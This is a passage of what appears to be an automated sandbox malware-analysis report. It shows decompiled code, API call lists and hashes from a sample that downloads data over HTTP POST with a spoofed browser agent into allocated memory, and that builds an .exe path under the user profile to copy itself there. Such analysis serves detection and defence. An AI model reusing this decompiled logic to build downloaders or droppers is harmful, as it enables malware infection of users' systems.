                                                                                                                                                                                                                                                                            						if(_t133 == 0) {
                                                                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if(HttpQueryInfoA(_v1568, 0x13,  &_v1916,  &_v1920,  &_v1924) != 0) {
                                                                                                                                                                                                                                                                            							_t137 = E007B7DD0( &_v1916);
                                                                                                                                                                                                                                                                            							_t196 = _t196 + 4;
                                                                                                                                                                                                                                                                            							_v1936 = _t137;
                                                                                                                                                                                                                                                                            							if(_a32 != 0) {
                                                                                                                                                                                                                                                                            								_t137 = _a32;
                                                                                                                                                                                                                                                                            								 *_a32 = _v1936;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						E007B7D20(_t137,  &_v1916, 0, 0x100);
                                                                                                                                                                                                                                                                            						_t196 = _t196 + 0xc;
                                                                                                                                                                                                                                                                            						_v1928 = 0x500000;
                                                                                                                                                                                                                                                                            						if(HttpQueryInfoA(_v1568, 5,  &_v1916,  &_v1920,  &_v1924) != 0) {
                                                                                                                                                                                                                                                                            							_t151 = E007B7DD0( &_v1916);
                                                                                                                                                                                                                                                                            							_t196 = _t196 + 4;
                                                                                                                                                                                                                                                                            							_v1940 = _t151;
                                                                                                                                                                                                                                                                            							if(_v1940 > 0 && _v1940 < 0x40000000) {
                                                                                                                                                                                                                                                                            								_v1928 = _v1940;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t143 = VirtualAlloc(0, _v1928, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            						_v1932 = _t143;
                                                                                                                                                                                                                                                                            						if(_v1932 == 0) {
                                                                                                                                                                                                                                                                            							_v2976 = 0;
                                                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                                                            								InternetReadFile(_v1568,  &_v2972, 0x400,  &_v2976);
                                                                                                                                                                                                                                                                            							} while (_v2976 > 0);
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							 *_a16 = _v1932;
                                                                                                                                                                                                                                                                            							 *_a20 = _v1928;
                                                                                                                                                                                                                                                                            							_v8 = 1;
                                                                                                                                                                                                                                                                            							_v1944 = _v1928;
                                                                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                                                                            								_v1948 = 0;
                                                                                                                                                                                                                                                                            								InternetReadFile(_v1568, _v1932, _v1944,  &_v1948); // executed
                                                                                                                                                                                                                                                                            								if(_a24 != 0) {
                                                                                                                                                                                                                                                                            									 *_a24 =  *_a24 + _v1948;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								if(_v1948 == 0) {
                                                                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v1932 = _v1932 + _v1948;
                                                                                                                                                                                                                                                                            								_v1944 = _v1944 - _v1948;
                                                                                                                                                                                                                                                                            								if(_v1944 > 0) {
                                                                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								L29:
                                                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							goto L29;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						L32:
                                                                                                                                                                                                                                                                            						_v1648 = _v1648 + 1;
                                                                                                                                                                                                                                                                            					} while (_v8 == 0 && _v1648 < 1);
                                                                                                                                                                                                                                                                            					goto L34;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}










































                                                                                                                                                                                                                                                                            0x007b1849
                                                                                                                                                                                                                                                                            0x007b1854
                                                                                                                                                                                                                                                                            0x007b1c95
                                                                                                                                                                                                                                                                            0x007b1c9b
                                                                                                                                                                                                                                                                            0x007b1878
                                                                                                                                                                                                                                                                            0x007b1878
                                                                                                                                                                                                                                                                            0x007b1882
                                                                                                                                                                                                                                                                            0x007b188c
                                                                                                                                                                                                                                                                            0x007b1896
                                                                                                                                                                                                                                                                            0x007b18a0
                                                                                                                                                                                                                                                                            0x007b18b5
                                                                                                                                                                                                                                                                            0x007b18ba
                                                                                                                                                                                                                                                                            0x007b18bd
                                                                                                                                                                                                                                                                            0x007b18cd
                                                                                                                                                                                                                                                                            0x007b18d3
                                                                                                                                                                                                                                                                            0x007b18e3
                                                                                                                                                                                                                                                                            0x007b18e9
                                                                                                                                                                                                                                                                            0x007b1902
                                                                                                                                                                                                                                                                            0x007b190a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b191d
                                                                                                                                                                                                                                                                            0x007b1923
                                                                                                                                                                                                                                                                            0x007b1930
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b1956
                                                                                                                                                                                                                                                                            0x007b195c
                                                                                                                                                                                                                                                                            0x007b1969
                                                                                                                                                                                                                                                                            0x007b1c88
                                                                                                                                                                                                                                                                            0x007b1c8f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b1c8f
                                                                                                                                                                                                                                                                            0x007b1994
                                                                                                                                                                                                                                                                            0x007b199a
                                                                                                                                                                                                                                                                            0x007b19a7
                                                                                                                                                                                                                                                                            0x007b1c7b
                                                                                                                                                                                                                                                                            0x007b1c82
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b1c82
                                                                                                                                                                                                                                                                            0x007b19c2
                                                                                                                                                                                                                                                                            0x007b19c8
                                                                                                                                                                                                                                                                            0x007b19e5
                                                                                                                                                                                                                                                                            0x007b1c6e
                                                                                                                                                                                                                                                                            0x007b1c75
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b1c75
                                                                                                                                                                                                                                                                            0x007b19eb
                                                                                                                                                                                                                                                                            0x007b19f9
                                                                                                                                                                                                                                                                            0x007b19fe
                                                                                                                                                                                                                                                                            0x007b19fe
                                                                                                                                                                                                                                                                            0x007b1a16
                                                                                                                                                                                                                                                                            0x007b1a1c
                                                                                                                                                                                                                                                                            0x007b1a26
                                                                                                                                                                                                                                                                            0x007b1a30
                                                                                                                                                                                                                                                                            0x007b1a30
                                                                                                                                                                                                                                                                            0x007b1a48
                                                                                                                                                                                                                                                                            0x007b1a4d
                                                                                                                                                                                                                                                                            0x007b1a50
                                                                                                                                                                                                                                                                            0x007b1a6d
                                                                                                                                                                                                                                                                            0x007b1a75
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b1aa1
                                                                                                                                                                                                                                                                            0x007b1aaa
                                                                                                                                                                                                                                                                            0x007b1aaf
                                                                                                                                                                                                                                                                            0x007b1ab2
                                                                                                                                                                                                                                                                            0x007b1abc
                                                                                                                                                                                                                                                                            0x007b1abe
                                                                                                                                                                                                                                                                            0x007b1ac7
                                                                                                                                                                                                                                                                            0x007b1ac7
                                                                                                                                                                                                                                                                            0x007b1abc
                                                                                                                                                                                                                                                                            0x007b1ad7
                                                                                                                                                                                                                                                                            0x007b1adc
                                                                                                                                                                                                                                                                            0x007b1adf
                                                                                                                                                                                                                                                                            0x007b1b0f
                                                                                                                                                                                                                                                                            0x007b1b18
                                                                                                                                                                                                                                                                            0x007b1b1d
                                                                                                                                                                                                                                                                            0x007b1b20
                                                                                                                                                                                                                                                                            0x007b1b2d
                                                                                                                                                                                                                                                                            0x007b1b41
                                                                                                                                                                                                                                                                            0x007b1b41
                                                                                                                                                                                                                                                                            0x007b1b2d
                                                                                                                                                                                                                                                                            0x007b1b57
                                                                                                                                                                                                                                                                            0x007b1b5d
                                                                                                                                                                                                                                                                            0x007b1b6a
                                                                                                                                                                                                                                                                            0x007b1c19
                                                                                                                                                                                                                                                                            0x007b1c23
                                                                                                                                                                                                                                                                            0x007b1c3d
                                                                                                                                                                                                                                                                            0x007b1c43
                                                                                                                                                                                                                                                                            0x007b1b70
                                                                                                                                                                                                                                                                            0x007b1b79
                                                                                                                                                                                                                                                                            0x007b1b84
                                                                                                                                                                                                                                                                            0x007b1b86
                                                                                                                                                                                                                                                                            0x007b1b93
                                                                                                                                                                                                                                                                            0x007b1b99
                                                                                                                                                                                                                                                                            0x007b1b99
                                                                                                                                                                                                                                                                            0x007b1bbf
                                                                                                                                                                                                                                                                            0x007b1bc9
                                                                                                                                                                                                                                                                            0x007b1bd9
                                                                                                                                                                                                                                                                            0x007b1bd9
                                                                                                                                                                                                                                                                            0x007b1be2
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b1bf2
                                                                                                                                                                                                                                                                            0x007b1c04
                                                                                                                                                                                                                                                                            0x007b1c11
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b1c15
                                                                                                                                                                                                                                                                            0x007b1c17
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b1c17
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b1be4
                                                                                                                                                                                                                                                                            0x007b1c4c
                                                                                                                                                                                                                                                                            0x007b1c55
                                                                                                                                                                                                                                                                            0x007b1c5b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b1a30

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InternetCrackUrlA.WININET(00000000,00000000,00000000,0000003C), ref: 007B1902
                                                                                                                                                                                                                                                                            • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1),00000001,00000000,00000000,00000000), ref: 007B191D
                                                                                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007B1956
                                                                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,*/*,00200300,00000000), ref: 007B1994
                                                                                                                                                                                                                                                                            • wnsprintfA.SHLWAPI ref: 007B19C2
                                                                                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,00000000), ref: 007B19DD
                                                                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,00000006,00007530,00000004), ref: 007B1A16
                                                                                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007B1A6D
                                                                                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 007B1A99
                                                                                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,00000005,?,00000100,00000000), ref: 007B1B07
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00500000,00003000,00000004), ref: 007B1B57
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,?,00000000), ref: 007B1BBF
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 007B1C3D
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 007B1C75
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 007B1C82
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 007B1C8F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internet$Http$CloseHandleRequest$FileInfoOpenQueryRead$AllocConnectCrackHeadersOptionSendVirtualwnsprintf
                                                                                                                                                                                                                                                                            • String ID: */*$0u$<$Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)$POST
                                                                                                                                                                                                                                                                            • API String ID: 880997049-2033563659
                                                                                                                                                                                                                                                                            • Opcode ID: 004b08ffef85958913b7b27029b3ead8bc867289d570335606fc0c2ed50b4741
                                                                                                                                                                                                                                                                            • Instruction ID: 2ac10cbac8b5e7f2cccf1c7e3d4bb40da0c437d7449c9a4a9fd93019325c38a9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 004b08ffef85958913b7b27029b3ead8bc867289d570335606fc0c2ed50b4741
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7DC139B1D4421C9BEB24CF54CC59FEAB7B5EB88304F4081D9E50DA6280DBBA6E94CF54
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                                                                                                                            			E007B4020(intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, char _a24) {
                                                                                                                                                                                                                                                                            				signed int _v5;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                                                            				struct _CRITICAL_SECTION _v44;
                                                                                                                                                                                                                                                                            				long _v48;
                                                                                                                                                                                                                                                                            				void* _v52;
                                                                                                                                                                                                                                                                            				void _v56;
                                                                                                                                                                                                                                                                            				long _v60;
                                                                                                                                                                                                                                                                            				HANDLE* _v64;
                                                                                                                                                                                                                                                                            				void* _v68;
                                                                                                                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                                                                                                                            				void* _v76;
                                                                                                                                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                                                                                                                            				void _v92;
                                                                                                                                                                                                                                                                            				long _v96;
                                                                                                                                                                                                                                                                            				signed int _v100;
                                                                                                                                                                                                                                                                            				HANDLE* _v104;
                                                                                                                                                                                                                                                                            				HANDLE* _v108;
                                                                                                                                                                                                                                                                            				void* _t114;
                                                                                                                                                                                                                                                                            				void* _t141;
                                                                                                                                                                                                                                                                            				void* _t188;
                                                                                                                                                                                                                                                                            				void* _t189;
                                                                                                                                                                                                                                                                            				void* _t191;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v5 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 > 0 && _a12 != 0 && _a16 > 0) {
                                                                                                                                                                                                                                                                            					E007B7D20( &_v56,  &_v56, 0, 0x29);
                                                                                                                                                                                                                                                                            					_t189 = _t188 + 0xc;
                                                                                                                                                                                                                                                                            					InitializeCriticalSection( &_v44);
                                                                                                                                                                                                                                                                            					_v16 = _a24;
                                                                                                                                                                                                                                                                            					_v20 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                            					asm("cdq");
                                                                                                                                                                                                                                                                            					_v12 = _a8 / _a20;
                                                                                                                                                                                                                                                                            					_v60 = 0;
                                                                                                                                                                                                                                                                            					while(_v60 < _a16) {
                                                                                                                                                                                                                                                                            						EnterCriticalSection( &_v44);
                                                                                                                                                                                                                                                                            						if(_v52 != 0) {
                                                                                                                                                                                                                                                                            							VirtualFree(_v52, 0, 0x8000);
                                                                                                                                                                                                                                                                            							_v52 = 0;
                                                                                                                                                                                                                                                                            							_v48 = 0;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t198 = _v56;
                                                                                                                                                                                                                                                                            						if(_v56 != 0) {
                                                                                                                                                                                                                                                                            							TerminateThread(_v56, 0);
                                                                                                                                                                                                                                                                            							_v56 = 0;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						ResetEvent(_v20);
                                                                                                                                                                                                                                                                            						LeaveCriticalSection( &_v44);
                                                                                                                                                                                                                                                                            						_t114 = CreateThread(0, 0, E007B4AC0,  &_v56, 0, 0); // executed
                                                                                                                                                                                                                                                                            						_v56 = _t114;
                                                                                                                                                                                                                                                                            						_v104 = E007B97A0( ~(0 | _t198 > 0x00000000) | _a20 * 0x00000004);
                                                                                                                                                                                                                                                                            						_v64 = _v104;
                                                                                                                                                                                                                                                                            						E007B7D20(_v104, _v64, 0, _a20 << 2);
                                                                                                                                                                                                                                                                            						_t191 = _t189 + 0x10;
                                                                                                                                                                                                                                                                            						_v100 = 0;
                                                                                                                                                                                                                                                                            						while(_v100 < _a20) {
                                                                                                                                                                                                                                                                            							_v64[_v100] = 0;
                                                                                                                                                                                                                                                                            							E007B7D20(_v64,  &_v92, 0, 0x1c);
                                                                                                                                                                                                                                                                            							_t191 = _t191 + 0xc;
                                                                                                                                                                                                                                                                            							_v68 =  &_v56;
                                                                                                                                                                                                                                                                            							_v72 = _a12;
                                                                                                                                                                                                                                                                            							_v92 = _a4;
                                                                                                                                                                                                                                                                            							_v84 = _v100 * _v12;
                                                                                                                                                                                                                                                                            							if(_v100 >= _a20 - 1) {
                                                                                                                                                                                                                                                                            								_v80 = _a8 - 1;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v80 = _v84 + _v12 - 1;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v76 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                            							_t141 = CreateThread(0, 0, E007B4BA0,  &_v92, 0, 0); // executed
                                                                                                                                                                                                                                                                            							_v64[_v100] = _t141;
                                                                                                                                                                                                                                                                            							WaitForSingleObject(_v76, 0xffffffff);
                                                                                                                                                                                                                                                                            							FindCloseChangeNotification(_v76); // executed
                                                                                                                                                                                                                                                                            							_v100 = _v100 + 1;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						WaitForMultipleObjects(_a20, _v64, 1, 0xffffffff);
                                                                                                                                                                                                                                                                            						_v96 = WaitForSingleObject(_v20, 0x2710);
                                                                                                                                                                                                                                                                            						if(_v96 == 0) {
                                                                                                                                                                                                                                                                            							_v5 = 1;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v96 = WaitForSingleObject(_v56, 0x3e8);
                                                                                                                                                                                                                                                                            						if(_v96 != 0) {
                                                                                                                                                                                                                                                                            							TerminateThread(_v56, 0);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						EnterCriticalSection( &_v44);
                                                                                                                                                                                                                                                                            						if(_v52 != 0) {
                                                                                                                                                                                                                                                                            							VirtualFree(_v52, 0, 0x8000);
                                                                                                                                                                                                                                                                            							_v52 = 0;
                                                                                                                                                                                                                                                                            							_v48 = 0;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						LeaveCriticalSection( &_v44);
                                                                                                                                                                                                                                                                            						_v108 = _v64;
                                                                                                                                                                                                                                                                            						E007B97C0(_v108);
                                                                                                                                                                                                                                                                            						_t189 = _t191 + 4;
                                                                                                                                                                                                                                                                            						if((_v5 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            							_v60 = _v60 + 1;
                                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					DeleteCriticalSection( &_v44);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v5;
                                                                                                                                                                                                                                                                            			}




























                                                                                                                                                                                                                                                                            0x007b4026
                                                                                                                                                                                                                                                                            0x007b402e
                                                                                                                                                                                                                                                                            0x007b405a
                                                                                                                                                                                                                                                                            0x007b405f
                                                                                                                                                                                                                                                                            0x007b4066
                                                                                                                                                                                                                                                                            0x007b406f
                                                                                                                                                                                                                                                                            0x007b4080
                                                                                                                                                                                                                                                                            0x007b4086
                                                                                                                                                                                                                                                                            0x007b408a
                                                                                                                                                                                                                                                                            0x007b408d
                                                                                                                                                                                                                                                                            0x007b409f
                                                                                                                                                                                                                                                                            0x007b40af
                                                                                                                                                                                                                                                                            0x007b40b9
                                                                                                                                                                                                                                                                            0x007b40c6
                                                                                                                                                                                                                                                                            0x007b40cc
                                                                                                                                                                                                                                                                            0x007b40d3
                                                                                                                                                                                                                                                                            0x007b40d3
                                                                                                                                                                                                                                                                            0x007b40da
                                                                                                                                                                                                                                                                            0x007b40de
                                                                                                                                                                                                                                                                            0x007b40e6
                                                                                                                                                                                                                                                                            0x007b40ec
                                                                                                                                                                                                                                                                            0x007b40ec
                                                                                                                                                                                                                                                                            0x007b40f7
                                                                                                                                                                                                                                                                            0x007b4101
                                                                                                                                                                                                                                                                            0x007b4118
                                                                                                                                                                                                                                                                            0x007b411e
                                                                                                                                                                                                                                                                            0x007b413d
                                                                                                                                                                                                                                                                            0x007b4143
                                                                                                                                                                                                                                                                            0x007b4153
                                                                                                                                                                                                                                                                            0x007b4158
                                                                                                                                                                                                                                                                            0x007b415b
                                                                                                                                                                                                                                                                            0x007b416d
                                                                                                                                                                                                                                                                            0x007b417f
                                                                                                                                                                                                                                                                            0x007b418e
                                                                                                                                                                                                                                                                            0x007b4193
                                                                                                                                                                                                                                                                            0x007b4199
                                                                                                                                                                                                                                                                            0x007b419f
                                                                                                                                                                                                                                                                            0x007b41a5
                                                                                                                                                                                                                                                                            0x007b41af
                                                                                                                                                                                                                                                                            0x007b41bb
                                                                                                                                                                                                                                                                            0x007b41d2
                                                                                                                                                                                                                                                                            0x007b41bd
                                                                                                                                                                                                                                                                            0x007b41c7
                                                                                                                                                                                                                                                                            0x007b41c7
                                                                                                                                                                                                                                                                            0x007b41e3
                                                                                                                                                                                                                                                                            0x007b41f7
                                                                                                                                                                                                                                                                            0x007b4203
                                                                                                                                                                                                                                                                            0x007b420c
                                                                                                                                                                                                                                                                            0x007b4216
                                                                                                                                                                                                                                                                            0x007b416a
                                                                                                                                                                                                                                                                            0x007b416a
                                                                                                                                                                                                                                                                            0x007b422d
                                                                                                                                                                                                                                                                            0x007b4242
                                                                                                                                                                                                                                                                            0x007b4249
                                                                                                                                                                                                                                                                            0x007b424b
                                                                                                                                                                                                                                                                            0x007b424b
                                                                                                                                                                                                                                                                            0x007b425e
                                                                                                                                                                                                                                                                            0x007b4265
                                                                                                                                                                                                                                                                            0x007b426d
                                                                                                                                                                                                                                                                            0x007b426d
                                                                                                                                                                                                                                                                            0x007b4277
                                                                                                                                                                                                                                                                            0x007b4281
                                                                                                                                                                                                                                                                            0x007b428e
                                                                                                                                                                                                                                                                            0x007b4294
                                                                                                                                                                                                                                                                            0x007b429b
                                                                                                                                                                                                                                                                            0x007b429b
                                                                                                                                                                                                                                                                            0x007b42a6
                                                                                                                                                                                                                                                                            0x007b42af
                                                                                                                                                                                                                                                                            0x007b42b6
                                                                                                                                                                                                                                                                            0x007b42bb
                                                                                                                                                                                                                                                                            0x007b42c4
                                                                                                                                                                                                                                                                            0x007b409c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b42c6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b42c4
                                                                                                                                                                                                                                                                            0x007b42d1
                                                                                                                                                                                                                                                                            0x007b42d1
                                                                                                                                                                                                                                                                            0x007b42dd

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(?), ref: 007B4066
                                                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 007B407A
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?), ref: 007B40AF
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007B40C6
                                                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000,00000000), ref: 007B40E6
                                                                                                                                                                                                                                                                            • ResetEvent.KERNEL32(00000000), ref: 007B40F7
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 007B4101
                                                                                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,007B4AC0,00000000,00000000,00000000), ref: 007B4118
                                                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 007B41DD
                                                                                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,007B4BA0,?,00000000,00000000), ref: 007B41F7
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007B420C
                                                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 007B4216
                                                                                                                                                                                                                                                                            • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 007B422D
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00002710), ref: 007B423C
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 007B4258
                                                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000,00000000), ref: 007B426D
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 007B4277
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007B428E
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 007B42A6
                                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?,?), ref: 007B42D1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$CreateThreadWait$EventObjectSingle$EnterFreeLeaveTerminateVirtual$ChangeCloseDeleteFindInitializeMultipleNotificationObjectsReset
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1593741596-0
                                                                                                                                                                                                                                                                            • Opcode ID: 34ee8a041d3a42b6f756d8d09e5c2cc042230b767384aa045039b0b7acbab0a2
                                                                                                                                                                                                                                                                            • Instruction ID: 26f1734e2bf748dc934222d5bb877484d5e96aa331ac984601026f8bca5de8fe
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34ee8a041d3a42b6f756d8d09e5c2cc042230b767384aa045039b0b7acbab0a2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD91F5B590020CEBDB14DFA8DC89FEDBBB5BB48705F108219FA15AB281D7789944CF54
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 567 7b1120-7b1134 568 7b12bb-7b12c1 567->568 569 7b113a-7b113e 567->569 569->568 570 7b1144-7b1150 lstrlenA 569->570 570->568 571 7b1156-7b1162 lstrlenA 570->571 571->568 572 7b1168-7b1175 571->572 573 7b118a-7b119b GetEnvironmentVariableA 572->573 574 7b1177-7b1188 GetAllUsersProfileDirectoryA 572->574 575 7b11a1-7b11d9 wnsprintfA lstrcmpiA 573->575 574->575 576 7b11db-7b11e1 575->576 577 7b1216-7b1287 call 7b97a0 lstrcpyA * 2 CreateThread 575->577 576->577 578 7b11e3-7b1210 CopyFileA SetFileAttributesA lstrcpyA 576->578 581 7b1289-7b128d 577->581 582 7b12a3-7b12b8 call 7b97c0 577->582 578->577 584 7b129a-7b12a1 581->584 585 7b128f-7b1298 581->585 582->568 584->568 585->584
                                                                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                                                                            			E007B1120(CHAR* _a4, CHAR* _a8, signed int _a12, signed char _a16, void** _a20) {
                                                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _v8;
                                                                                                                                                                                                                                                                            				long _v12;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				char _v284;
                                                                                                                                                                                                                                                                            				void* _v288;
                                                                                                                                                                                                                                                                            				char _v556;
                                                                                                                                                                                                                                                                            				void* _v560;
                                                                                                                                                                                                                                                                            				void* _v564;
                                                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 != 0 && lstrlenA(_a4) != 0 && lstrlenA(_a8) != 0) {
                                                                                                                                                                                                                                                                            					_v12 = 0x104;
                                                                                                                                                                                                                                                                            					if((_a12 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            						GetEnvironmentVariableA("USERPROFILE",  &_v284, 0x104);
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						__imp__GetAllUsersProfileDirectoryA( &_v284,  &_v12);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					wnsprintfA( &_v556, 0x103, "%s\\%s.exe",  &_v284, _a8);
